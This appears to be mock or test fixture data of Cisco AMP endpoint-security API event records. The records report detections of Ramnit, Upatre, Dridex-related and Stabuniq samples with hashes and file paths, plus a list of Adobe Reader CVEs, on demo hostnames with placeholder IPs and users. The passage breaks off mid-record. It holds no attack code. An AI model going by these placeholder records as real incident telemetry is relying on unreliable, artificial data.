-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758215","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":189000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758213","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":17000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758212","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":970000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":939000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892411109048000,"timestamp":1610704826,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361000000300,"timestamp":1610704823,"timestamp_nanoseconds":0,"date":"2021-01-15T10:00:23+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704823,"start_date":"2021-01-15T10:00:23+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263623","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263622","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263621","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":673000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263620","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263619","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":627000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207844921180000,"timestamp":1610704822,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:00:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207844921180170","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659264906658000,"timestamp":1610704820,"timestamp_nanoseconds":460000000,"date":"2021-01-15T10:00:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659264906657801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361224000800,"timestamp":1610704819,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:00:19+00:00","event_type":"Executed 